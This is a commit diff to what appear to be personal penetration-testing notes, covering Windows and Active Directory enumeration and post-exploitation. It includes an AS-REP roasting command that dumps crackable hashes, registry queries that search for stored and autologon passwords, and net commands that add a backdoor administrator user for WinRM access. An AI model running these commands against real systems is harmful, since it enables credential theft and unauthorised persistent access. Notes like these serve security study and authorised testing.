added windows enumeration details.

Enumeration/AS-REP Roasting.md

@@ -0,0 +1,12 @@
+# AS-Rep Roating
+
+AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
+This is somewhat similar to Kerberoasting but includes user accounts as well.
+
+## Usage
+
+Impacket got `GetNPUsers` to check non pre-authenticated user accounts and find credentials.
+
+```sh
+impacket-GetNPUsers $TARGET_DOMAIN/ -dc-ip $TARGET_DC_IP -usersfile $USERS_FILE  -format hashcat -outputfile hashes.txt -no-pass
+```

Enumeration/Windows/Powershell.md

@@ -1,18 +1,23 @@
 # Powershell Usage
 
 ## Get-Help
+
 ```
 Get-Help Command-Name
 ```
-* Show examples
+
+Show examples
+
 ```
 Get-Help Command-Name -Examples
 ```
 
-* Get-Command gets all the cmdlets installed on the current Computer. 
+Get-Command gets all the cmdlets installed on the current Computer.
+
 ```
 Get-Command
 ```
+
 ```
 Get-Command Verb-*
 Get-Command Invoke-*
@@ -20,19 +25,23 @@ Get-Command Get-*
 ```
 
 ## Passing Output via Pipe
-* A pipe passes object including methods and attributes.
+
+ A pipe passes object including methods and attributes.
 
 ```
 Verb-Noun | Get-Member
 ```
+
 ```
 Get-Command | Get-Member -MemberType Method
 ```
 
 ## Creating Objects from Previous Cmdlets
+
 ```
 Get-ChildItem | Select-Object -Property Mode, Name
 ```
+
 * first - gets the first x object
 * last - gets the last x object
 * unique - shows the unique objects

Enumeration/Windows/Registry.md

@@ -0,0 +1,9 @@
+# Registry Enumeration
+
+## Usage
+
+Query keys including the string `password` via `reg`.
+
+```sh
+reg query HKLM /f "password" /t REG_SZ /s
+```

Post Exploitation/Windows/Add Users.md

@@ -1,16 +1,61 @@
-# Add user as system user
+# Users
+
+## List Users
+
+List local users
+
+```
+net user
+```
+
+List users of the domain
+
+```
+net user /domain
+```
+
+Get more information about a user
+
+```
+net user Administrator /domain
+```
+
+## List Groups
+
+List local groups
+
+```
+net localgroup
+```
+
+List groups of the domain
+
+```
+net group /domain
+```
+
+Get more information about a group
+
+```
+net group Administrator /domain
+```
+
+## Add user as system user
+
 ```sh
 net user <username> <password> /add
 ```
+
 ```sh
 net localgroup Administrator <username> /add
 ```
+
 ```sh
 net localgroup "Remote Management Users" <username> /add
 ```
+
 ```sh
 net user <username>
 ```
-* connect via winRM
-
 
+connect via winRM afterwards using the new user

Post Exploitation/Windows/Registry.md

@@ -1,7 +1,17 @@
 # Windows Registry
 
 ## AutoLogin Password
-* Automatic logon password is save in plaintext 
+
+Automatic logon password is save in plaintext
+
 ```
 reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon"
 ```
+
+## Search for Passwords
+
+Use `reg` to search for passwords inside Keys of the registry via the following line.
+
+```
+reg query HKLM /f "password" /t REG_SZ /s
+```